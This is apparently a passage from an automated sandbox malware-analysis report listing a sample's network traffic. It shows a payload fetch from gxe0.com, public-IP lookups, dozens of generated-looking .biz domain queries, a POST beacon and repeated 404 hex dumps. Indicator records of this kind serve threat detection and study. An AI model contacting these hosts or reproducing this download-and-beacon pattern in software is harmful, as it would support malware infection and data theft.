Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic DNS traffic detected: DNS query: gcedd.biz
Source: global traffic DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic DNS traffic detected: DNS query: xccjj.biz
Source: global traffic DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic DNS traffic detected: DNS query: uaafd.biz
Source: unknown HTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:57 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not 